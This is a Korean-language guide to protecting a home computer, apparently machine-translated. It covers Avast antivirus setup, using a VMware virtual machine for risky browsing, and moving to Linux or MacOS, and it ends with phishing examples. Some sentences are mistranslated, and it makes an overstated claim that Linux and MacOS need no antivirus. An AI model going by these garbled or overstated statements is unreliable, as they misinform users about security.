악당의 웹사이트에 가면 무엇을 볼 수 있나요? 반 친구들의 메인 페이지가 보이지만 로그인과 비밀번호를 입력하면 곧바로 "악당"으로 이동합니다. 그리고 일부 링크를 클릭하면 "계정 확인"에 대한 매우 멋진 요청을 받게 됩니다. 또한 텍스트에는 "일부 Megafon 지역의 가입자는 서비스를 사용할 수 없습니다."라고 명확하게 명시되어 있습니다. 이 문제에 대한 진지한 접근 방식으로 인해 문구의 의미를 즉시 이해하지 못했습니다.
피해자가 되지 않으려면 인터넷에서 안전을 유지하고 컴퓨터를 보호하기 위해 필요한 노력을 기울여야 합니다!
이 기사 또는 지침에서 나 Vladimir Belev(이전에는 Moscow Instrument-Making College의 기술자, 엔지니어 및 교사 직책을 맡았음)는 일반 사용자가 컴퓨터를 보호할 수 있는 3가지 간단하고 가능한 옵션에 대해 설명합니다. 기사 끝부분의 댓글에 있는 모든 질문에 가능한 한 답변해 드리겠습니다.
깃털 침대를 어디에 놓아야 할지 알면, 그것을 놓는 것이 더 좋습니다!
기사로 빠르게 이동 소개컴퓨터에서 인터넷을 여행할 때 다양한 맬웨어에 컴퓨터가 감염되는 현상이 발생할 수 있습니다. 이는 파일 손상 및 운영 체제의 정상적이고 안정적인 작동 중단부터 전체 시스템에 이르기까지 완전히 다른 결과를 초래할 수 있습니다. 실패, 심지어 중요한 개인정보 도난까지!
또한 컴퓨터를 직접 감염시키는 것 외에도 다양한 사이트의 로그인 및 비밀번호는 물론 은행 카드 정보 및 기타 정보와 같은 매우 중요한 데이터를 훔칠 수 있는 사기꾼의 피해자가 될 수도 있습니다. 손실이 발생하면 귀하의 계좌에 자금이 갑자기 상각될 수 있습니다.
따라서 인터넷에서 작업할 때는 먼저 매우 조심하고 의심스럽고 위험한 사이트를 방문하지 말고 컴퓨터 보호 조치를 취해야 합니다.
아래에서는 컴퓨터에서 인터넷 작업을 할 때 다양한 유형의 위협으로부터 자신을 보호할 수 있는 옵션이 무엇인지 보여드리겠습니다.
옵션 1. 간단한 바이러스 백신 보호 적용(Windows 사용 시)이는 아마도 개인 데이터 보호 기능과 결제 시 추가 보호 기능을 갖춘 일부 바이러스 백신 제품 세트를 포함하여 인터넷의 다양한 위협으로부터 컴퓨터를 보호하는 가장 적절하고 간단하며 광범위한 방법일 것입니다. 인터넷.
바이러스 백신은 물론 다양한 스파이웨어 방지, 트로이 목마 방지 및 동일한 범주에 속하는 기타 유틸리티는 유료 또는 무료로 제공될 수 있으며 물론 서로 다른 제조업체에서 개발합니다. 저는 두 가지 모두를 직접 경험했으며 경험과 실습, 다양한 실험을 통해 무료 바이러스 백신이 적절한 컴퓨터 보호 기능을 제공할 수 있다는 분명한 결론에 도달했습니다.
하지만 언제 유료를 선택하고 언제 무료 바이러스 백신을 선택해야 할까요? 내 대답은 무료를 사용하는 것이 더 쉽다는 것입니다.
유료 바이러스 백신은 대부분 비밀번호 보호 저장소, 컴퓨터 청소를 위한 내장 프로그램, 브라우저, 컴퓨터에 설치된 소프트웨어 업데이트 등 추가 기능이 많다는 점에서만 다릅니다. . 다양한 해커 공격으로부터 컴퓨터를 보호하고 일반적으로 특정 규칙에 따라 특정 프로그램이 인터넷에 액세스하지 못하도록 차단하는 방화벽과 같은 추가 보안 요소도 내장할 수 있습니다.
하지만 필요한 경우 이 모든 기능은 무료 옵션에서 별도로 찾을 수 있으며 비용을 지불할 필요가 없다고 생각합니다.
오늘 저는 4년 이상 연속으로 사용해 온 무료 Avast 바이러스 백신을 선택했습니다.
지난 4년 동안 저는 인터넷에서 심각한 감염을 발견한 적이 없습니다. 이로 인해 시스템 작동과 시스템에 설치된 프로그램에 사소한 문제가 발생할 수도 있습니다. 물론, 이 모든 것은 일반적으로 의심스러운 이메일의 링크를 클릭하지 않고, 의심스럽고 신뢰할 수 없는 사이트에 다양한 데이터를 입력하지 않고, 일반적으로 사이트를 방문하지 않고 사이트를 조심스럽게 "탐방"하는 것과 같은 간단한 일을 고려하지 않고는 아닙니다. 신뢰를 불러 일으키지 마십시오!
아래에서는 높은 수준의 보호 기능을 제공하기 위해 무료 버전의 Avast 바이러스 백신을 설치하고 구성하는 방법을 보여 드리겠습니다.
최신 버전의 Windows에는 이미 "Windows Defender"라고 하는 표준 바이러스 보호 기능이 있지만 보안 강화를 위해, 특히 초보자 사용자의 경우 타사 바이러스 백신을 사용하는 것이 좋습니다(설치하면 표준 보호 기능이 자동으로 꺼집니다). .
바이러스 백신 설치다음 링크를 사용하여 공식 웹사이트에서 바이러스 백신을 다운로드할 수 있습니다.
페이지에서 "무료 바이러스 백신 다운로드" 버튼을 클릭합니다(이름이 약간 다를 수 있음).
그렇지 않은 경우 다운로드를 확인하거나 바이러스 백신 버전(무료 또는 유료)을 선택해야 하는 다른 페이지로 리디렉션될 수 있습니다.
다운로드한 파일을 실행하여 설치를 시작하세요.
바로 설치버튼을 누르지 마시고 '설정'을 눌러주세요!
이제 설치할 바이러스 백신 구성 요소를 선택해야 합니다.
아래 이미지에서 바이러스 백신의 가장 중요하고 필수 구성 요소는 노란색 원으로 표시되어 있으며 이는 컴퓨터를 직접 보호합니다(컴퓨터의 실시간 파일, 인터넷에서 다운로드한 파일, 메일을 확인하고 시스템 동작도 분석). 의심스러운 활동에 대해). 이 상자를 선택 취소하지 마십시오!
위의 동일한 이미지와 같이 다른 모든 것을 설정할 수 있습니다. 나머지 일부는 쓸모가 없고 다른 부분은 무료 버전의 바이러스 백신에서 작동하지 않기 때문에 정확히 이 구성 요소 세트를 권장합니다. 또는 자신에게 불필요하다고 생각되는 것을 끌 수도 있습니다.
원하는 구성 요소 옆에 있는 물음표 위에 마우스를 올리면 어떤 구성 요소가 어떤 용도로 사용되는지 확인할 수 있습니다.
“설치”를 클릭하세요.
설치가 완료되면 다른 창에서 “계속”을 여러 번 클릭하세요.
설치 후 마지막 창에서는 Android 스마트폰이나 태블릿에 바이러스 백신을 설치하라는 메시지가 표시됩니다. 언제든지 장치 자체에서 직접 이 작업을 수행하거나 이 창을 통해 즉시 설치할 수 있습니다.
거부하려면 아래의 '아니요, 원하지 않습니다'를 클릭하세요.
모든 바이러스 백신, 특히 스마트폰의 경우 추가 부담이 되며(장치 속도가 느려질 수 있음) 배터리 소모 속도도 증가한다는 점을 기억하세요! 제 경험상 안드로이드에서는 바이러스 잡기가 그리 쉽지 않고, Windows보다 훨씬 어렵고, 위험한 사이트를 방문하지 않으면, 쭉 안드로이드 OS가 탑재된 스마트폰을 사용해 왔다고 말씀드리고 싶습니다. , 감염된 적이 없어 작동 장치가 고장 나거나 불안정해졌습니다.
이것으로 설치가 완료됩니다!
무료 라이센스 활성화바이러스 백신을 설치한 후 즉시 무료 라이센스를 활성화하는 것이 좋습니다. 30일이 지나면 바이러스 백신이 만료되었다는 신호를 보내기 시작할 수 있기 때문입니다. 성가신 경고가 나타나고 곧 바이러스 백신이 완전히 꺼질 수 있습니다. 그러나 활성화는 몇 분이면 완료되며 구독은 1년 동안 즉시 제공되며, 이후에는 다시 1년 동안 연장할 수 있으며 무한정 연장할 수 있습니다.
기본 바이러스 백신 창을 열고 "활성화"를 클릭하십시오.
"Avast Free Antivirus" 열에서 "선택"을 클릭하세요.
다음 창에서 유료 보호 평가판 설치를 거부합니다.
이것이 활성화의 전부입니다. 활성화 기간이 거의 끝나가는 경우 프로그램에서 경고를 표시하며 절차를 반복하면 됩니다.
바이러스 백신 설정바이러스 백신이 안정적으로 작동하는지 확인하고 불필요한 다양한 기능을 비활성화하려면 몇 가지 설정을 지정하는 것이 좋습니다.
기본 바이러스 백신 창에서 "설정"을 엽니다.
이는 가능한 "스마트" 악성 코드가 바이러스 백신을 비활성화하거나 해당 설정을 관리하지 못하도록 하기 위한 것입니다.
"비밀번호" 하위 섹션으로 이동하여 "비밀번호로 Avast 보호" 기능을 활성화하고 비밀번호를 설정하세요. 가장 간단한 것조차도 가능합니다. 그리고 아래 이미지와 같이 보호 영역에 대한 설정을 지정할 수 있습니다.
"구성 요소" 탭을 열고 여기에서 각 보호 구성 요소를 별도로 구성할 수 있습니다.
처음에 설정된 설정은 그대로 둘 수 있으며 바이러스 백신은 시스템에 과부하를 주지 않고 동시에 잘 보호합니다. 감도 수준만 "높음"으로 설정하여 변경하는 것이 좋습니다(원래 값은 "보통"임). 이렇게 하려면 각 구성 요소의 설정을 하나씩 열고 "감도" 탭에서 "높음"으로 설정하세요. 변경 사항을 저장하는 것을 잊지 마세요!
바이러스 검사 바이러스 백신이 아무리 훌륭하고 올바르게 구성되어 있더라도 컴퓨터에서 무언가가 누락될 가능성은 항상 있습니다. 따라서 시스템을 양호한 상태로 유지하고 더욱 안전하게 유지하려면 정기적으로(예: 한 달에 한 번) 컴퓨터 전체에 대한 위협 검사를 수행해야 합니다.
Avast 바이러스 백신으로 컴퓨터를 검사하려면 "보호" 섹션으로 이동하여 "바이러스 백신"을 선택하세요.
컴퓨터 전체 검사를 실행하기 전에 이러한 유형의 검사를 약간 설정하는 것이 좋습니다. 이렇게 하려면 이 유형의 스캐닝을 사용하여 블록 모서리에 있는 기어를 클릭하세요.
"검사" - "파일 형식" 섹션에서 "모든 파일 검사" 상자를 선택하여 검사를 최대한 철저하게 수행하십시오(그러나 시간이 더 오래 걸립니다).
"민감도" 섹션에서 민감도를 높게 설정하고 "전체 파일 검사" 옵션을 활성화합니다.
"아카이버"섹션에서 "모든 아카이버"를 선택하십시오.
이 보호 방법은 다음과 같습니다. 컴퓨터에는 특별한 프로그램이 설치되어 있으며 이를 통해 새 운영 체제(원하는 운영 체제)를 설치하고 실제 시스템에서 해당 운영 체제를 사용할 수 있습니다.
특별한 프로그램을 통해 작동하는 이 운영 체제는 가상 머신, 즉 가상 컴퓨터와 같습니다.
이것은 무엇을 제공합니까? 가상 머신은 실제 시스템과 별도의 환경이므로, 바이러스가 그곳에 도착하더라도 실제 시스템에 해를 끼치지 않고 그대로 유지됩니다.
가상 머신("가상 머신"이라고 함)을 사용하려면 컴퓨터의 우수한 성능이 필요합니다. 간단히 말해서, 컴퓨터는 강력해야 합니다! 물론 가상 머신으로 설치할 시스템에 따라 많은 것이 달라집니다. 예를 들어 Windows XP는 최신 Windows 10보다 몇 배나 적은 컴퓨터 리소스를 필요로 하기 때문입니다. 컴퓨터가 약하면 정상적으로 작업할 수 없습니다. 가상 머신에서는 실제 시스템이 느려지고 일부 일상적인 작업을 처리하지 못할 수 있습니다.
가상 머신으로 작업하려면 어떤 종류의 컴퓨터가 필요합니까? 때로는 그냥 가져가서 확인하는 것이 더 쉽습니다. 저것들. 가상 머신을 설치하고 필요한 양의 RAM을 할당한 후 작업하는 것이 정상적인지 불편한지 확인하세요. Core i 또는 AMD의 유사한 라인의 프로세서를 사용하는 것이 더 좋습니다. RAM은 4GB 이상입니다. 이전 Windows 7에서도 정상 작동을 위해서는 2GB가 필요하기 때문입니다. 메모리. 따라서 컴퓨터의 총 용량이 4GB 미만인 경우. RAM, 가상 머신은 잊어도 됩니다.)
위에 작성된 내용을 바탕으로 다음 두 가지 옵션으로 가상 머신을 사용할 수 있습니다.
인터넷을 "탐색"하고 무언가를 다운로드하는 등 대부분의 작업을 여기에서 수행합니다.
예를 들어, 신뢰성이 확실하지 않은 사이트를 방문하거나, 안전성이 확실하지 않은 파일을 다운로드하거나, 알 수 없는 모든 종류의 프로그램을 설치하는 등 가상 머신에서 특정 작업만 수행하십시오.
가상 머신에서 대부분의 시간을 보내는 것은 단순히 불편하기 때문에 첫 번째 방법을 사용하지 않을 것입니다. 둘째, 일반 시스템과 마찬가지로 가상 머신에서 편안하게 작업하려면 매우 강력한 컴퓨터가 필요하며 이는 실제 시스템에서 일부 작업을 병렬로 수행할 수 있다는 사실을 고려하지 않은 것입니다.
가상 머신 생성 및 작업을 위한 VMware Workstation Player 설치가상 머신 작업을 위한 VMware Workstation Player 프로그램은 64비트 버전의 Windows가 설치된 컴퓨터에서만 실행됩니다! 이제 대부분의 경우 이 Windows 버전이 컴퓨터에 설치됩니다. 어쨌든 설치를 시도해 볼 수 있습니다.
다음 링크를 따라 공식 웹사이트에서 프로그램을 다운로드할 수 있습니다.
열리는 페이지에서 Windows 버전(Windows 64비트 운영 체제용) 반대편에 있는 "다운로드" 버튼을 클릭하면 프로그램이 컴퓨터에 다운로드되기 시작합니다.
설치 파일을 다운로드한 후 실행해 주세요.
첫 번째 설치 창에서 다음을 클릭합니다.
설치 단계 중 하나에서 "Enhanced Keyboard Driver" 확인란을 선택하고 "Next"를 클릭합니다.
이 옵션을 활성화하면 가상 머신에 확장 키보드 드라이버가 설치되므로 만일의 경우에 대비해 설치하는 것이 좋습니다.
설치 창 중 하나에서 "VMWare Workstation 12 Player 개선 지원" 옵션을 선택 취소하고 첫 번째 옵션은 활성화된 상태로 둡니다.
첫 번째 옵션은 프로그램이 자동으로 업데이트를 확인하고 새 버전이 있으면 즉시 업데이트할 수 있음을 의미합니다. 두 번째 옵션은 컴퓨터에서 이 프로그램 작동에 대한 익명 정보를 보내 프로그램 개발자에게 지원을 제공하는 것입니다.
이렇게 하면 설치가 완료되었습니다.
이제 프로그램을 실행하면 다음과 같은 창이 나타납니다.
여기에서는 위 이미지와 같이 첫 번째 항목을 선택하고 이메일 주소를 표시해야 합니다. 이는 프로그램을 무료로 사용하기 위해서만 필요합니다. 이메일을 입력하신 후 "계속"을 클릭하세요.
다음 창에서 "마침"을 클릭하세요.
프로그램 창이 열립니다.
가상 머신 생성이제 기본 프로그램 창에서 "새 가상 머신 생성"을 클릭하여 새 가상 머신을 생성합니다.
이제 우리는 운영 체제를 가상 시스템으로 설치할 파일이나 디스크의 위치를 선택해야 하는 단계에 도달했습니다. 창에는 CD/DVD 디스크에서 설치(설치 프로그램 디스크) 또는 컴퓨터에 저장된 이미지 파일에서 설치(설치 프로그램 디스크 이미지 파일)라는 두 가지 옵션이 있습니다. 가상 OS로 설치하려는 OS가 포함된 CD/DVD가 있는 경우 첫 번째 옵션을 선택하십시오.
예를 들어, Windows 7이 설치된 디스크가 있고 이 시스템을 가상 시스템으로 설치하려고 합니다. 그런 다음 이 시스템이 포함된 디스크를 컴퓨터에 삽입하고 첫 번째 옵션을 선택합니다.
그러나 설치용 운영 체제는 "이미지"라는 컴퓨터의 특수 파일에 저장될 수도 있습니다. 그런 다음 이 파일에서 직접 운영 체제를 가상 머신으로 설치할 수 있습니다. 다음은 Windows XP 운영 체제가 포함된 이미지 파일의 예입니다.
VMWare Workstation Player는 ".ISO" 형식의 이미지 파일을 지원하므로 운영 체제에 ISO 이미지 파일이 있는 경우 가상 머신을 설치하는 가장 쉬운 방법은 ISO 이미지 파일을 이용하는 것입니다. 그런 다음 현재 창에서 두 번째 옵션을 선택합니다.
"찾아보기" 버튼을 사용하면 운영 체제에서 원하는 이미지 파일만 선택할 수 있습니다.
원하는 옵션을 선택한 후 아래의 "다음" 버튼을 클릭하세요.
모든 운영 체제를 가상 운영 체제로 설치할 수 있습니다. 모든 Windows 시스템, Linux 또는 기타 모든 시스템!
예를 들어, 가장 오래된 Windows XP는 오랫동안 지원되지 않았고 많은 프로그램이 제대로 작동하지 않을 수 있으며 많은 프로그램이 전혀 작동하지 않기 때문에 Windows 7을 설치하는 것이 좋습니다. 최신 버전(Windows 8 및 10)의 경우 정상적인 작동을 위해서는 컴퓨터에서 더 많은 성능이 필요합니다.
다음 창에서는 운영 체제 설치를 위한 키를 미리 지정하고 사용자 이름과 비밀번호를 지정하라는 메시지가 표시됩니다.
결국 가상 머신에 운영 체제를 설치하는 것은 컴퓨터에 실제 OS를 설치하는 것과 다르지 않습니다. 유일한 차이점은 시스템이 실제 하드 드라이브가 아닌 가상 창에 설치된다는 것입니다. 하지만 해당 창에서는 자동으로 설정될 가능성이 높은 사용자 이름만 남겨 두는 것이 좋습니다(실제 OS에서 가져옴). 필요한 경우 OS 설치 중에 키 및 기타 매개변수를 지정하는 것이 더 쉽습니다. 따라서 해당 창에서 계속하려면 “다음”을 클릭하세요.
키를 제공하지 않았다는 경고 창이 나타날 수도 있습니다. 예를 클릭하세요.
다음 창의 첫 번째 필드에는 생성 중인 가상 머신의 이름을 표시하고 두 번째 필드에는 컴퓨터의 가상 머신 파일 위치를 표시해야 합니다.
원하는 대로 부를 수 있으며 일반적으로 설치할 OS의 이름이라고 합니다. 가장 중요한 것은 나중에 여러 가상 OS를 갑자기 설치하고 사용하는 경우 OS가 어디에 있는지 스스로 이해한다는 것입니다. 저것들. "1234"라고 부르지 마십시오. 실행하기 전에는 해당 이름을 가진 가상 머신이 어떤 종류인지 스스로 알 수 없기 때문입니다.
컴퓨터에서 가상 머신의 위치(즉, 실제 시스템의 폴더나 드라이브)를 선택할 수 있습니다. 선택한 폴더에는 가상 머신 실행을 담당하는 파일(많은 파일이 있음)이 위치하게 됩니다.
가상 머신은 많은 공간을 차지한다는 점에 유의하세요! 설치되는 시스템에 따라 다릅니다.
이름과 위치를 지정했다면 "다음"을 클릭하세요.
다음 창에서는 생성된 가상 머신의 작동을 위해 할당할 하드 드라이브의 볼륨을 표시해야 합니다. 이것은 매우 중요한 단계입니다!
이미 말했듯이 가상 머신은 실제 OS와 거의 다르지 않습니다. 그녀는 또한 가상 드라이브만 있는 자신만의 하드 드라이브를 갖게 됩니다.
그리고 가상 OS 하드 디스크의 볼륨은 가상 머신에 할당한 실제 하드 디스크의 볼륨과 동일합니다.
여기의 모든 내용은 가상 운영 체제로 설치하는 운영 체제에 따라 달라집니다. 예를 들어 Windows XP의 경우 하드 드라이브에 많은 공간이 필요하지 않으며 약 10-15GB이면 충분합니다.
그러나 최신 Windows 운영 체제: 7, 8, 10은 작동을 위해 최소한 30GB 이상의 여유 디스크 공간이 필요하며 더 나아가 더 많은 디스크 공간이 필요합니다(가상 머신의 용도에 따라 다름).
그리고 현재 창의 첫 번째 필드에서는 생성 중인 가상 머신에 할당할 실제 하드 드라이브의 양을 지정해야 합니다.
예를 들어 이미 말했듯이 Windows XP의 30일 평가판을 설치하겠습니다. 이 시스템의 경우 15GB이면 충분합니다. 가상 디스크 볼륨.
실제 하드 드라이브에는 최소한 가상 머신에 할당한 만큼의 여유 공간이 있어야 합니다!
해당 옵션을 선택하여 가상 OS가 실행될 가상 하드 디스크를 여러 파일로 나눌 필요가 없음을 나타냅니다. 두 번째 옵션인 "가상 디스크를 여러 파일로 분할"을 선택하면 가상 하드 디스크가 여러 파일로 분할됩니다.
다음 창에서는 생성 중인 가상 머신의 설정에 대한 정보를 받게 됩니다. 지금 바로 "마침"을 클릭하여 가상 머신 설치를 시작할 수 있지만 지금은 그렇게 하지 않겠습니다.
또 다른 매우 중요한 설정을 이해하기 위해 가상 머신의 추가 설정으로 이동하고 이를 위해 "하드웨어 사용자 정의" 버튼을 클릭해 보겠습니다.
여러 탭의 설정이 포함된 추가 창이 열립니다. 우리는 가상 머신에 할당된 컴퓨터의 RAM 양을 구성하는 "메모리" 탭에만 관심이 있습니다.
이 창에서는 가상 머신의 작동을 위해 할당될 실제 RAM의 양을 지정해야 합니다.
모든 것은 설치할 운영 체제에 따라 다릅니다. Windows XP의 경우 매우 느리긴 하지만 128MB의 메모리만으로 작동할 수 있습니다.
1~2GB를 할당하는 것이 좋습니다. 램. Windows 7, 8 또는 10을 가상 머신으로 설치하는 경우 최소 2GB를 할당하는 것이 좋습니다. 랜덤 액세스 메모리.
그러나 한 가지 더 중요한 점이 있습니다. 컴퓨터에 이미 RAM이 거의 없다면 가상 시스템에 많은 양을 할당할 수 없습니다!
컴퓨터에 메모리가 2GB만 있는 경우(이러한 컴퓨터는 현재 매우 약함) 가상 머신에 512MB(메가바이트) 이상의 메모리를 할당할 가능성은 없습니다. 더 많이 할당하면 기본 시스템이 시작될 수 있기 때문입니다. 심하게 속도를 늦추는 것. 이것을 고려하십시오!
일반적으로 컴퓨터가 약한 경우 가상 머신을 사용하지 않는 것이 더 쉽습니다.
가상 머신 설정에 대한 정보가 포함된 창으로 돌아가게 되며 이제 가상 머신 설치를 직접 진행할 차례입니다!
설치가 즉시 시작되도록 "생성 후 이 가상 머신 전원 켜기" 확인란이 선택되어 있는지 확인하고 "마침"을 클릭합니다.
구성한 가상 OS의 설치가 시작됩니다. 먼저, 실제 컴퓨터 하드웨어 중 일부가 가상 머신에 연결되어 있음을 알리는 창이 나타날 뿐만 아니라 중요하지 않은 다양한 정보가 포함된 창이 나타납니다. 이 창에서 "이 힌트를 다시 표시하지 않음" 확인란을 선택하고 "확인"을 클릭하세요.
그러면 가상 OS 설치가 시작됩니다. Windows XP를 예로 들면 다음과 같습니다.
시스템을 가상 머신으로 설치하는 것은 이 시스템을 컴퓨터에 설치하는 실제 프로세스와 다르지 않습니다.
운영 체제를 가상 운영 체제로 설치하면 즉시 시작됩니다. 모든 것은 다음과 같습니다(예: VMWare 프로그램 창의 운영 체제).
시스템을 시작하자마자 추가 도구 설치가 자동으로 시작됩니다. 이는 주로 실제 시스템에서 가상 OS 창으로 또는 그 반대로 파일을 쉽게 끌어서 놓을 수 있고 가상 머신으로 창 크기를 자유롭게 변경할 수 있도록 하기 위해 필요합니다.
가상 머신 작업 시 중요한 차이점
옵션 #3. 운영 체제 Linux 또는 MacOS 중 하나를 (지속적으로) 사용하십시오. 세계에서 가장 널리 사용되는 Windows 운영 체제 외에도 유사 제품이 있습니다. 가장 널리 사용되는 아날로그는 Linux 및 MacOS 시스템입니다.
Linux는 누구나 인터넷에서 무료로 다운로드하여 컴퓨터에 설치할 수 있는 무료 운영 체제입니다.
MacOS는 모든 Apple 컴퓨터(Macbook)의 기본 시스템입니다.
이 두 시스템에는 공통적으로 매우 중요한 기능이 하나 있습니다. 즉, 많은 사람들에게 친숙한 Windows보다 훨씬 안전합니다. 이것이 바로 제가 이러한 시스템에서 작업하는 것을 안전한 컴퓨터 작업을 위한 세 번째 옵션으로 분류한 이유입니다.
Linux 또는 MacOS에서 작업할 때 바이러스 백신 소프트웨어를 사용할 필요조차 없습니다! 확실히 감염 위험은 있지만 Windows에 비해 미미합니다. 특히 다양한 바이러스, 트로이 목마 및 기타 위협의 대부분은 Windows를 실행하는 컴퓨터용으로 개발되고 이러한 파일이 Linux 또는 MacOS에 있는 경우 간단히 감염될 수 있습니다. 무해할 것.
Linux로 전환해야 할까요, 아니면 Windows를 계속 사용해야 할까요?결정하는 것은 당신에게 달려 있습니다! 그러나 이것은 일부 기능에서만 Windows와 유사하며 그 이상은 전혀 다른 근본적으로 다른 시스템이라고 말할 수 있습니다. 그들은 완전히 다른 인터페이스를 가지고 있습니다. Windows에는 없고 이러한 시스템에는 있는 다른 프로그램이 많이 있습니다(그 반대도 마찬가지입니다). 일부 프로그램의 경우 아날로그를 찾아야 합니다(예: Linux용 Adobe Photoshop은 없습니다). 일반적으로 구조가 완전히 다른 시스템입니다.
따라서 귀하가 수준에 미치지 못하지만 이미 Windows 작업에 적응한 컴퓨터를 사용하는 초보자라면 Linux 또는 MacOS로의 완전한 전환이 실제 문제가 될 수 있습니다. 숙련된 사용자이지만 수년 동안 Windows에서만 작업해 온 사용자의 경우 Linux로의 전환에는 뉘앙스, 많은 질문 및 일부 사항에 대한 오해가 없을 수 없습니다.
이 경우 이 가이드에 설명된 보안 조치를 사용하면 Windows에서 작업하는 것이 더 쉬울 것입니다. 더욱이, Linux 및 MacOS는 바이러스 위협으로부터의 보안을 고려하더라도 웹사이트 비밀번호, 은행 카드, 계좌 데이터와 같은 개인 데이터의 도난으로부터 완전히 보호되지 않습니다.
데이터 도난의 책임은 사용자 자신의 미숙함, 부주의로 인해 실수로 가짜가 아닌 사이트에 접속하는 것만으로도 충분하므로 거기에 로그인과 비밀번호를 입력하십시오 (자신이 익숙한 사이트에 로그인하고 있다고 생각) 필요) 그게 전부입니다. 데이터는 공격자가 보낸 것입니다! 이는 사용자의 부주의로 인해 데이터가 도난당할 수 있는 방법의 한 예일 뿐입니다.
알림! 우리는 잊지 말아야 한다시스템과 개인 데이터를 손상시키는 바이러스, 중요한 데이터 도난, 해킹 및 기타 모든 것으로부터 자신을 보호하기 위해 컴퓨터에서 작업할 때 어떤 보호 조치를 사용하더라도 이를 보장할 수 없다는 점을 아는 것이 중요합니다. 경험 부족, 무지, 부주의로 인해 위험에 처한 경우 인터넷에서 100% 안전한 검색이 가능합니다.
가장 간단한 예입니다. 인터넷의 누군가가 귀하에게 이메일 비밀번호 재설정을 요청했고 귀하는 그 사람을 신뢰하여 이를 보냅니다. 그런 다음 이 사람은 원하는 대로 귀하의 메일을 처리하고 모든 편지를 삭제하거나 귀하를 대신하여 불쾌한 일을 하려고 합니다. 이 경우 인터넷 서핑에 사용하는 보호 기능은 무엇입니까? 전혀 아무것도!
가장 진보된 바이러스 백신이든, 가상 머신이든, 보안 Linux나 기타 시스템에서 실행 중이든 상관없습니다. 이 경우에는 귀하 자신이 데이터를 공격자에게 전송했으며 일반적으로 사용자의 경험 부족과 부주의로 인해 과도한 신뢰로 인해 항상 발생하기 때문에 이 모든 것이 어떤 식으로든 도움이 되지 않습니다.
개인 데이터 도난으로 이어지는 사용자 부주의의 예를 들어보겠습니다.
VKontakte 소셜 네트워크 계정에 로그인한다고 가정해 보겠습니다. 평소처럼 이 소셜 네트워크의 웹사이트에 접속하지만, 웹사이트 주소가 실제 주소와 조금 다르다는 사실조차 인지하지 못하는 것 같습니다.
이 소셜 네트워크의 원래 주소는 vk.com이고 귀하는 VKontakte 사이트와 디자인이 완전히 동일한 vc.com 사이트에 접속하게 되었습니다.
따라서 이 가짜 사기 사이트에 접속한 후 아무 것도 주의하지 않고 사용자 이름과 비밀번호를 입력하여 계정에 로그인합니다. 그리고는 이런! 귀하의 데이터, 즉 로그인 및 비밀번호는 이미 공격자의 손에 들어가게 됩니다! 그리고 왜? 단순한 부주의, 아마도 경험이 부족할 것입니다. 이 경우에도 보호 수단이 도움이 되지 않습니다. 물론 바이러스 백신은 피싱 사이트에 대해 경고할 수 있지만 항상 그런 것은 아닙니다. 왜냐하면 이 가짜 사이트가 다른 날 나타날 수 있고 아직 데이터베이스에 입력되지 않았기 때문입니다.
그리고 그러한 예는 엄청나게 많이 주어질 수 있습니다 ...
그러므로 인터넷을 탐색할 때는 항상 주의를 기울이고 주의를 기울이십시오. 다음은 몇 가지 권장 사항입니다.